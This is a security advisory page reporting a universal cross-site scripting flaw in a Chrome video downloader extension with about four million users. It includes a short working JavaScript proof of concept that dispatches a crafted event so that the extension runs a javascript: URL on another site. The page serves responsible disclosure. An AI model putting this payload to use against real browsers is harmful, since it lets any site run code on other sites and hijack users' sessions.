Video Downloader Universal Cross Site Scripting

2018.04.07

Tavis Ormandy (US)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Video Downloader Extension: Universal XSS
Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users:
https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en
It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site).
Any website can do this:
// Change the active tab
window.open("https://google.com");
// Run code in the new tab
setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000);
That will run arbitrary code on <a href="http://google.com" title="" class="" rel="nofollow">google.com</a>.
I reported this bug to the cws team.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: taviso

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Video Downloader Universal Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.